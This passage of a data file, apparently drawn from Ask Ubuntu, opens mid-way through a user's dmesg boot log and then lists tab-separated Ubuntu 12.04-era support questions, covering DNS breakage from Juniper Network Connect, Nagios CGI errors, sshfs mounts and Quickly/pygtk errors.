56.097218 ] type=1400 audit ( 1340701632.748:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=977 comm= '' apparmor_parser '' [ 56.097697 ] type=1400 audit ( 1340701632.748:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=977 comm= '' apparmor_parser '' [ 56.097962 ] type=1400 audit ( 1340701632.748:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=977 comm= '' apparmor_parser '' [ 56.119273 ] type=1400 audit ( 1340701632.768:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=980 comm= '' apparmor_parser '' [ 56.119825 ] type=1400 audit ( 1340701632.768:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=980 comm= '' apparmor_parser '' [ 56.120496 ] type=1400 audit ( 1340701632.772:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince '' pid=978 comm= '' apparmor_parser '' [ 56.126495 ] type=1400 audit ( 1340701632.776:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince//launchpad_integration '' pid=978 comm= '' apparmor_parser '' [ 56.167916 ] bluetooth : rfcomm tty layer initialized [ 56.167924 ] bluetooth : rfcomm socket layer initialized [ 56.167925 ] bluetooth : rfcomm ver 1.11 [ 56.171308 ] sky2 0000:09:00.0 : eth0 : enabling interface [ 56.172168 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 56.600301 ] fglrx_pci 0000:01:00.0 : irq 48 for msi/msi-x [ 56.601010 ] [ fglrx ] firegl kernel thread pid : 1185 [ 56.601125 ] [ fglrx ] firegl kernel thread pid : 1186 [ 56.601232 ] [ fglrx ] firegl kernel thread pid : 1187 [ 56.601374 ] [ fglrx ] irq 48 enabled [ 57.789816 ] [ fglrx ] gart uswc size:1236 m. [ 57.789820 ] [ fglrx ] gart cacheable size:489 m. [ 57.789826 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 57.789828 ] [ fglrx ] reserved fb block : unshared offset : fc21000 , size:3df000 [ 57.789831 ] [ fglrx ] reserved fb block : unshared offset:1fffb000 , size:5000 [ 62.734097 ] retire_capture_urb : 33 callbacks suppressed after booting into a kubuntu live cd and running fsck on sda6 my new dmesg log is as follows : it 's a lot better , but there is still some things that need fixing ... [ 2.207381 ] usbcore : registered new interface driver ums-realtek [ 3.022438 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 24.927346 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 24.947348 ] udevd [ 528 ] : starting version 175 [ 24.989016 ] lp : driver loaded but no devices found [ 25.114602 ] adding 4189180k swap on /dev/sda7 . priority : -1 extents:1 across:4189180k [ 25.224313 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 25.224318 ] disabling lock debugging due to kernel taint [ 25.227858 ] wmi : mapper loaded [ 25.352057 ] ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro [ 25.355222 ] [ fglrx ] maximum main memory to use for locked dma buffers : 3789 mbytes . [ 25.355665 ] [ fglrx ] vendor : 1002 device : 9552 count : 1 [ 25.357794 ] acpi device:36 : registered as cooling_device2 [ 25.358339 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a03:00/device:34/lnxvideo:00/input/input6 [ 25.358403 ] acpi : video device [ vid ] ( multi-head : yes rom : no post : no ) [ 25.358460 ] [ firmware bug ] : duplicate acpi video bus devices for the same vga controller , please try module parameter `` video.allow_duplicates=1 '' if the current driver does n't work . [ 25.359042 ] [ fglrx ] ioport : bar 1 , base 0xde00 , size : 0x100 [ 25.359060 ] pci 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 25.359066 ] pci 0000:01:00.0 : setting latency timer to 64 [ 25.359351 ] [ fglrx ] kernel pat support is enabled [ 25.359381 ] [ fglrx ] module loaded - fglrx 8.96.4 [ mar 12 2012 ] with 1 minors [ 25.368882 ] lib80211 : common routines for ieee802.11 drivers [ 25.368887 ] lib80211_crypt : registered algorithm 'null' [ 25.401959 ] wl 0000:0c:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 25.401974 ] wl 0000:0c:00.0 : setting latency timer to 64 [ 25.427178 ] lib80211_crypt : registered algorithm 'tkip' [ 25.584831 ] dcdbas dcdbas : dell systems management base driver ( version 5.6.0-3.2 ) [ 25.746084 ] type=1400 audit ( 1340791412.412:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=650 comm= '' apparmor_parser '' [ 25.746547 ] type=1400 audit ( 1340791412.412:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=650 comm= '' apparmor_parser '' [ 25.746801 ] type=1400 audit ( 1340791412.412:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=650 comm= '' apparmor_parser '' [ 25.764322 ] eth1 : broadcom bcm4315 802.11 hybrid wireless controller 5.100.82.38 [ 25.798103 ] input : dell wmi hotkeys as /devices/virtual/input/input7 [ 25.865145 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 25.865372 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 25.865409 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 25.876496 ] udevd [ 542 ] : renamed network interface eth1 to wlan0 [ 25.921141 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 25.921292 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 26.061800 ] bluetooth : core ver 2.16 [ 26.061903 ] net : registered protocol family 31 [ 26.061905 ] bluetooth : hci device and connection manager initialized [ 26.061909 ] bluetooth : hci socket layer initialized [ 26.061912 ] bluetooth : l2cap socket layer initialized [ 26.062236 ] bluetooth : sco socket layer initialized [ 26.088065 ] bluetooth : rfcomm tty layer initialized [ 26.088072 ] bluetooth : rfcomm socket layer initialized [ 26.088074 ] bluetooth : rfcomm ver 1.11 [ 26.118242 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 26.118246 ] bluetooth : bnep filters : protocol multicast [ 26.134631 ] ppdev : user-space parallel port driver [ 26.207491 ] init : failsafe main process ( 840 ) killed by term signal [ 26.235813 ] type=1400 audit ( 1340791412.900:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=914 comm= '' apparmor_parser '' [ 26.236834 ] type=1400 audit ( 1340791412.904:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=914 comm= '' apparmor_parser '' [ 26.318889 ] input : ps/2 mouse as /devices/platform/i8042/serio2/input/input10 [ 26.346789 ] input : alpsps/2 alps glidepoint as /devices/platform/i8042/serio2/input/input11 [ 26.616832 ] type=1400 audit ( 1340791413.284:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=962 comm= '' apparmor_parser '' [ 26.617434 ] type=1400 audit ( 1340791413.284:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=962 comm= '' apparmor_parser '' [ 26.617705 ] type=1400 audit ( 1340791413.284:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=962 comm= '' apparmor_parser '' [ 26.618409 ] type=1400 audit ( 1340791413.284:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=961 comm= '' apparmor_parser '' [ 26.630449 ] type=1400 audit ( 1340791413.296:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=965 comm= '' apparmor_parser '' [ 26.649811 ] sky2 0000:09:00.0 : eth0 : enabling interface [ 26.651318 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 27.402907 ] vesafb : mode is 1024x768x32 , linelength=4096 , pages=0 [ 27.402910 ] vesafb : scrolling : redraw [ 27.402913 ] vesafb : truecolor : size=0:8:8:8 , shift=0:16:8:0 [ 27.402921 ] mtrr : type mismatch for e0000000,400000 old : write-back new : write-combining [ 27.402925 ] mtrr : type mismatch for e0000000,200000 old : write-back new : write-combining [ 27.402929 ] mtrr : type mismatch for e0000000,100000 old : write-back new : write-combining [ 27.402932 ] mtrr : type mismatch for e0000000,80000 old : write-back new : write-combining [ 27.402935 ] mtrr : type mismatch for e0000000,40000 old : write-back new : write-combining [ 27.402939 ] mtrr : type mismatch for e0000000,20000 old : write-back new : write-combining [ 27.402942 ] mtrr : type mismatch for e0000000,10000 old : write-back new : write-combining [ 27.402945 ] mtrr : type mismatch for e0000000,8000 old : write-back new : write-combining [ 27.402949 ] mtrr : type mismatch for e0000000,4000 old : write-back new : write-combining [ 27.402952 ] mtrr : type mismatch for e0000000,2000 old : write-back new : write-combining [ 27.402955 ] mtrr : type mismatch for e0000000,1000 old : write-back new : write-combining [ 27.403550 ] vesafb : framebuffer at 0xe0000000 , mapped to 0xffffc90005380000 , using 3072k , total 3072k [ 27.404339 ] console : switching to colour frame buffer device 128x48 [ 27.404362 ] fb0 : vesa vga frame buffer device [ 28.122642 ] fglrx_pci 0000:01:00.0 : irq 48 for msi/msi-x [ 28.123347 ] [ fglrx ] firegl kernel thread pid : 1182 [ 28.123472 ] [ fglrx ] firegl kernel thread pid : 1183 [ 28.123566 ] [ fglrx ] firegl kernel thread pid : 1184 [ 28.123711 ] [ fglrx ] irq 48 enabled [ 29.455557 ] [ fglrx ] gart uswc size:1236 m. [ 29.455561 ] [ fglrx ] gart cacheable size:489 m. [ 29.455567 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 29.455570 ] [ fglrx ] reserved fb block : unshared offset : fc21000 , size:3df000 [ 29.455573 ] [ fglrx ] reserved fb block : unshared offset:1fffb000 , size:5000
156152	can i install and use lamp with wubi ?	i would like to try the ubuntu os with the windows installer and to set up an apache server for testing . will this work ? can i call `` sudo tasksel install lamp-server '' to have lamp installed on a ubuntu desktop install ( via wubi ) , or it only works with ubuntu server install ? thank you .
156154	how to prevent juniper network connect breaking dns resolutions	juniper network connect has been an issue on 64bit linux for quite sometime . i have found 2 solutions to the java issue ( solution 1 and 2 ) but now i am struggling with a new issue . network connect makes changes directly to the /etc/resolv.conf file . this causes issues with the newer way that ubuntu does dns resolutions which is to point dns to the local resolver/cacher : dnsmasq . once nc disconnects and you change networks , eg go from office to home then dns stops working correctly . what happens is that nc deletes the /etc/resolv.conf file which is actually symlinked to /run/resolvconf/resolv.conf . whats worse is that nc actually deletes the original file not the link . so when you try to restore the file with : sudo ln -s /run/resolvconf/resolv.conf /etc/resolv.conf it fails as /run/resolvconf/resolv.conf is now gone . re-installing resolvconf does not fix it and neither does running resolvconf . so the best way i have found so far is to first backup /run/resolvconf/resolv.conf to another location . after you disconnect nc i then run a script that removes /etc/resolv.conf , replaces the deleted /run/resolvconf/resolv.conf and then links it 's back to /etc again . does anyone know a way to avoid this or do i pretty much have he best `` fix '' in place already ? any way to prevent nc from breaking it in the first place . oh how i wish juniper would sort their issues out . juniper has been notoriously horrible on linux and 64bit especially for over 4 years now .
156157	how green are ubuntu and canonical ?	im a student of environmental engineering , currently searching for a bachelor thesis theme . i am curious , if there any internal information about ubuntu related to co2/energy saving compared to other operating systems . and what canonical does for the environment/sustainability in the offices , during the work etc , in general . thank you so much ! greeting from lisbon
156159	how do i recompile x.org from git ?	i am having some problems with wheelmouse and mouse movement at the same time on ubuntu 12.04 and i found that the problem has been solved here : http : //cgit.freedesktop.org/xorg/xserver/commit/ ? id=2d4fda4b09e67e47d3e6fc4743fc6e81bfe40f28 how do i apply these changes to my own system as this would resolve my problem i 'm having perfectly ! ?
156160	maximizing a window taking a long time on 12.04	on my ubuntu 12.04 maximizing a window - for example terminal - is taking a long time ( 5+ seconds ) . other applications , such as an empathy chat window , are taking up to 2 seconds to maximize . i have an nvidia card in the laptop , and things were fine before upgrading ubuntu from 10.10 to 12.04 . now there are no more wobbly windows and it takes a while to maximize a window . thanks
156166	bluetooth and mobile broadband is not working in ubuntu 12.04	bluetooth and mobile broadband connection is not working in ubuntu 12.04 ... after upgrading system from 11.10 ... .plz do help ...
156169	how do i set up file sharing between two ubuntu laptops on my wireless network ?	i have two laptops running ubuntu 12.04 . both connect to the same wifi network to access internet . how do i connect them to each other so that i can access files on one from another and vice versa ? also , how do i manage the user permissions , etc . on them ?
156175	ubuntu 12.04 dropbox installation issue ( stuck at 99 % )	i have ubuntu 12.04 64-bit . yes , i read this post : dropbox install stuck at 99 % , how do i fix it ? ( and any dpkg errors ) i even tried to use 64 and 32-bit versions , tried to download it with wget , tried to compile it from sources . i have n't any effect : it load my core i5 for about 100 % , and there is no progress after 99 % . how can i to fix it ?
156181	pygtk : scrolllist with entry , can i set an id	i have a scroll list on my window that i am going to insert 2 entry for each row , i am trying to understand how i can catch the entry that has been changed and update my array with this value . i will explain what is my code : i have an array that has 2 fields : name and description each row has 2 entry , name and description when i am going to modify the row number 2 i want to update my object on my array : rows [ 1 ] .name = xxx rows [ 1 ] .description = yyy
156182	how to install mysql-6.0.10-alpha ?	currently , i am using server version : 5.5.24-0ubuntu0.12.04.1 ( ubuntu ) version of mysql . unfortunately the relational operators are n't working on temporal data types for e.g date . i see that mysql-6.0.10-alpha has already been released : thought the bugs might have been fixed ; though could n't find a way to install it on ubuntu 12.04 . example : - mysql > select emp_id , fname , lname , start_date , title from employee ; + -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- + | emp_id | fname | lname | start_date | title | + -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- + | 1 | michael | smith | 2001-06-22 | president | | 2 | susan | barker | 2002-09-12 | vice president | | 3 | robert | tyler | 2000-02-09 | treasurer | | 4 | susan | hawthorne | 2002-04-24 | operations manager | | 5 | john | gooding | 2003-11-14 | loan manager | | 6 | helen | fleming | 2004-03-17 | head teller | | 7 | chris | tucker | 2004-09-15 | teller | | 8 | sarah | parker | 2002-12-02 | teller | | 9 | jane | grossman | 2002-05-03 | teller | | 10 | paula | roberts | 2002-07-27 | head teller | | 11 | thomas | ziegler | 2000-10-23 | teller | | 12 | samantha | jameson | 2003-01-08 | teller | | 13 | john | blake | 2000-05-11 | head teller | | 14 | cindy | mason | 2002-08-09 | teller | | 15 | frank | portman | 2003-04-01 | teller | | 16 | theresa | markham | 2001-03-15 | head teller | | 17 | beth | fowler | 2002-06-29 | teller | | 18 | rick | tulman | 2002-12-12 | teller | + -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- + 18 rows in set ( 0.00 sec ) mysql > select emp_id , fname , lname , start_date , title from employee where start_date > = '2006-01-01 ' ; empty set ( 0.00 sec )
156184	how do i install 10.04 on a vortex86dx embdedded system ?	i am trying to install ubuntu on a netcom nc-499 board that contains a vortex86dx processor . the processor vendor claims support for ubuntu 10.04 but i am having problems installing it . i am trying to install to a 8gb compact flash card attached to the board with an ide connector , using a usb connection cd-rom drive and a burned iso image obtained from this link http : //old-releases.ubuntu.com/releases/10.04.0/ubuntu-10.04.3-desktop-i386.iso . installation proceeds up to the point of around 78 % but during the stage where the installer informs me that it is `` configuring apt '' , the installer terminates with a popup dialog containing the following `` the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . '' i have no idea what to do at this point . i am a linux novice and i do not really know how to investigate the problems with the installation . i have configured the bios exactly according to how the vendor specifies and they assure me that this version is fully compatible with their hardware and yet i am unable to get a decent install . i am able to install ubuntu 8.04 using exactly the same procedure successfully so i am sure there is no problem with my cd-rom compatibility or the compact flash drive . any help will be gratefully received .
156187	how do i create a kiosk-mode where only one application runs , no games , etc . ?	i want to create a point-of-sale ( pos ) system with ubuntu . ( i.e . cash register ) . the system should start with the pos application , and shutdown when the pos app is closed . it must be locked down , and allow no other apps to be run , such as games , etc .
156188	network-manager restart impossible	~ $ service network-manager restart stop : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.77 '' ( uid=1000 pid=10033 comm= '' stop network-manager `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' stop '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.78 '' ( uid=1000 pid=10030 comm= '' start network-manager `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) any hints ? the common network problem in ubuntu 12.04 with hang up within a couple of minutes . with sudo i can restart the network-manager but it does n't have effect to the connection .
156196	why do i get this error when i mount a machine using sshfs ?	i thought i asked about this before , but i ca n't find it . i have a computer called `` mythbuntu '' that is on my lan . when i first boot the computer i work from , i see an entry for `` mythbuntu '' in my `` places '' menu , like so : when i click on it , i get this error message : however , once i dismiss it , there are two entries for my mythbuntu computer in the `` places '' menu , where the bottom one is the one that works : this is my entry in /etc/fstab for the mythbuntu computer , which i adapted from some tutorial somewhere on the net : sshfs # mythbuntu @ 192.168.0.4 : /home/mythbuntu /home/dave/mythbuntu fuse comment=sshfs , user , noauto , transform_symlinks how can i set it up so that my mythbuntu computer mounts on boot without having any error messages or having to click on a menu entry to activate it ?
156197	quickly project system-notifications dont work ( `` import pynotify '' fails )	if i create a quickly-project with the following command in terminal : quickly create ubuntu-application helloworld and then add in the helloworldwindow.py the following lines , import sys import pynotify the line `` import pynotify '' produces the following error-output on my system when i want to run the application with quickly run error-output : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for typepygtkgenericcellrenderer ' is smaller than the parent type 's gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertionnode ! = null ' failed from gtk import _gtk the application wo n't start . but if i want to run the following python-application # ! /usr/bin/python import sys import pynotify if __name__ == `` __main__ '' : if not pynotify.init ( `` icon-summary-body '' ) : sys.exit ( 1 ) n = pynotify.notification ( `` notification '' , `` hello notify ! it works ! `` , `` notification-message-im '' ) n.show ( ) e.g . by saving the code in a filename `` notify.py '' , i am able to run the code with the command in terminal : python notify.py and the notification works fine ! what is the problem with the via quickly created python applicaton ? ? why is the import not working ? ? i am new with quickly and python .
156199	where can i download the synaptics touchpad suite ?	on synaptics website , they advertise the synaptics touchpad suite for linux , but it is not available for download . am i looking in the wrong place ? how do i get a hold of this ? this would solve my clickpad problems that people are currently hacking around ...
156200	how to usewebcam cli	i am new to ubuntu and am trying to capture a frame from usb webcam using webcam cli . can you please tell me how to do that . how to pass the config parameters to the api . any help appreciated .
156201	how to add `` refresh '' option to right click menu in lubuntu ?	i have many users at the place i work , expressing the notion of switching to ubuntu . most of them , for whatever weird reason wanting to know if its possible to have refresh added when you right click on the desktop . is that possible ?
156205	nagios on virtualhost cgi problems	i have been moving my nagios on apaches virtualhost and adding the following configuration file < virtualhost *:80 > serveradmin webmaster @ localhost servername nagios.example.com serveralias nagios.example.com documentroot /usr/local/nagios/share scriptalias /cgi-bin/nagios /usr/local/nagios/sbin scriptalias /nagios/cgi-bin /usr/local/nagios/sbin # where the stylesheets ( config files ) reside # alias /nagios/stylesheets /usr/local/nagios/share # where the html pages live alias /nagios /usr/local/nagios/share < directory /usr/local/nagios/share > options followsymlinks directoryindex index.php allowoverride authconfig order allow , deny allow from all authname `` nagios access '' authtype basic authuserfile /etc/nagios3/htpasswd.users require valid-user < /directory > < /virtualhost > when i browse the page i 'm getting the following error : the requested url /cgi-bin/tac.cgi was not found on this server . checking the scriptaliases routes everything seems to be alright . clicking inside of a menu the cgi problem do not persist , just on page browsing .
156209	can not update using update manager because `` package operation failed ''	the system says i have 17 packages downloaded but not installed . whenever i try to update it using the update manager , it tries to update it but ends up in the error package operation failed . the installation or removal of a package failed with the following details : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libunistring0 ' : input/output error error in function : please help
156212	will ubuntu run slower in a virtual machine ?	i have been using ubuntu 10.04 for some time now as a dual boot system but on separate stand alone partition on the same machine . however i have decided to use it from the same partition but through windows using vmware v8 , so is there any possibility to be able to boot it from with in windows while ubuntu being on a separate dual boot partition , already installed ? and how much speed impact there would be on ubuntu 10.04 64bit lts if the vmware v8 software being used is 32bit itself on a 32bit windows xp pro also ? if the above scenario is not possible to boot ubuntu from with in windows using vmware v8 then is there any alternative available to do boot ubuntu in the said way ?
156214	how do i get nvidia gt650m working ?	i just bought a brand new asus n56vz laptop witch comes with a 3610qm ivy bridge ( +hd4000 ) cpu and a a nvidia kepler gt650m gpu . so everything seems to work out of the box with ubuntu 12.04 exept that i ca n't get the nvidia gpu working ( and the fn keys , but i 'll try to figure this out later : p ) ... i tried to install the last unix driver available on nvidia 's website and during the installation process , i had a message telling me that here was no generated xorg script for my distribution ... i installed it anyway . after a reboot i now have a 640p resolution that i ca n't even change on system= > display ... plus , nvidia-settings does'nt seems to find any nvidia card on my laptop . lspci list the gpu card as a compatible controller . i would also want to install bumblebee , but without a working gpu , that sure ca n't happens : p
156216	why does my empathy work with wifi but not with wvdial on 12.04 ?	i really need help for this issue . my empathy works well when i 'm online using wifi .. but it does't work when i 'm online using wvdial . . in ubuntu 11.10 , empathy works great.. any ideas to fix this ? ?
156219	is it possible to logout to any other de without close any running application ?	refer to my title , is it possible to do that ? let say im on unity with running vps on virtual box , but i want to switch to gnome without shutdown my vps and run back on gnome . is it possible ? please advice .
156226	ca n't show preferences dialog	i 'm having some trouble with python , again . i created a project using quickly , and it created a preferences dialog for me . i am now trying to build up the preferences dialog , but i always get some error pointing me at a piece of code quickly generated itself . robin @ robinj : ~/ubuntu one/python/gtkreddit $ quickly run /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) warning : gtkreddit_lib : connect_signals ( ) 'expected handler 'btnrefresh_clicked ' in /home/robin/ubuntu one/python/gtkreddit/gtkreddit/gtkredditwindow.pyc' traceback ( most recent call last ) : file `` bin/gtkreddit '' , line 33 , in < module > gtkreddit.main ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit/__init__.py '' , line 33 , in main window = gtkredditwindow.gtkredditwindow ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit_lib/window.py '' , line 35 , in __new__ new_object.finish_initializing ( builder ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit/gtkredditwindow.py '' , line 50 , in finish_initializing dlgpreferences = preferencesdialog ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit_lib/preferencesdialog.py '' , line 26 , in __new__ new_object.finish_initializing ( builder ) attributeerror : 'nonetype ' object has no attribute 'finish_initializing' this is the piece it is complaining about ; def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the preferences dialog '' '' '' super ( preferencesgtkredditdialog , self ) .finish_initializing ( builder ) the entire code can be found here . please assist . i 'm pretty new to python .
156227	duplicate sources.list entry but can not find the duplicates ?	i 'm running 12.04 64bit , and every time i update using the command land , i always get w : duplicate sources.list entry http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted amd64 packages ( /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted i386 packages ( /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted amd64 packages ( /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 packages ( /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i 've looked at loads of suggestions from previous problems including unselecting the sources from software sources , or manually removing the 'duplicates ' manually from sources.list . however , when trying to fix it , i 've not found the duplicates highlighted anywhere ? so i have no idea why this message keeps coming up . the errors are n't causing anything detrimental to my system but it just looks a bit messy and i would like to know what 's causing it . any ideas ? thanks !
156230	how do i cut and paste terminal i/o without using the mouse ?	i want to search and cut text from command output in a terminal so i can use it in subsequent command line invocations or just in an editor session . is there any way to easily run a regular expression against the output of a terminal and cutting results without touching the mouse ? my requirements are : it should work while working with remote machines through ssh . in those machines i can not install extra software there so the solution must be local . if possible , it must be `` always present '' . for instance , if i 'm running a long process and suddenly it fails i 'd like to be able to grep through the output without having to start the process again with a prepared environment .
156232	what is mean by application must run out of /opt ?	when i was going to rules of ubuntu apps showdown , i found this rule : application must run out of /opt . what is means by this ? checkout rules : http : //developer.ubuntu.com/showdown/
156234	how do i configure lightdm so user could choose session type only	i need to configure lightdm , so user could only choose session type which will then start automatically without password . and when he had choosen 'kiosk ' session , it should start as quest . when he had choosen 'desktop ' , then normal session should start for user 'my_user ' . is it possible with lightdm ? probably using scripts ? ! or maybe create own greeter ? update please note i do n't want do run these session in parallel . thank you !
156240	ubuntu one sharing structure for multiple users	i wish to implement ubuntu one for a small office . each user will have a small set of personal files ( documents , pictures etc . ) , and also read/write access to a larger set of common files . some users have multiple computers , android phones & tablets . the personal and common files should be synced across all of an individual 's devices and also with a file server which is used for backups and other processing . i have set up accounts for each user aa @ domain , bb @ domain , etc and have set up a central account office @ domain for the file server . personal sharing for each user across devices is working perfectly . for the common files - i placed them in the ubuntu one folder on the file server and shared 'mystorage ' view/change from office @ to each of the users . this worked on the users computers as they appear under 'shared with me ' but i can not see the shared files on the android client for sharing the personal files with the file server for backups i have to share each synced folder individually e.g . ~/documents from aa @ to office @ . i can not see a way of sharing all personal folders . i can not share 'mystorage ' from the user as the personal folders are marked as synced . is this the correct structure to follow anyway ?
156242	strangely quickly runs but debugger crashes with no exception	firstly , strangely quickly run on my app runs fine and i believe i have made no changes to the source since quickly debug was working ( proclaiming it 's not user error is distasteful , i know ! ) . winpdb itself crashes while my app is initializing inside the boilerplate window.py inside gio.settings ( ) . glib-gio-error ** : settings schema 'net.launchpad.cookety-app ' is not installed . i have checked folder data/glib-2.0/schemas and all is as it was when i created project with schemas present . i have stepped through the code right inside /usr/lib/python2.7/dist-packages/gi/overrides/gio.py , and found out that settings.__init__ ( ) is where it crashes . no exceptions , no debugger pausing , just a straight connection lost and winpdb closes thus making it insane for me to even get to the line of code that creates the problem.. most frustrating . please help !
156249	how can i figure out which theme is used by the user ?	i use ubuntu 's toolbar theme ( context ) in my application which is black for ambiance and grey for radiance . so i have got two icon packs ( a white and a black one ) , but how can i figure out which theme is used by the user ? so i 'll can write an if statement for it .
156251	execute file with default program from zsh ?	in windows powershell i can open a pdf in adobe reader by doing > invoke-item ~/path/to/my.pdf is there a way to open files in the default gui app from zsh ?
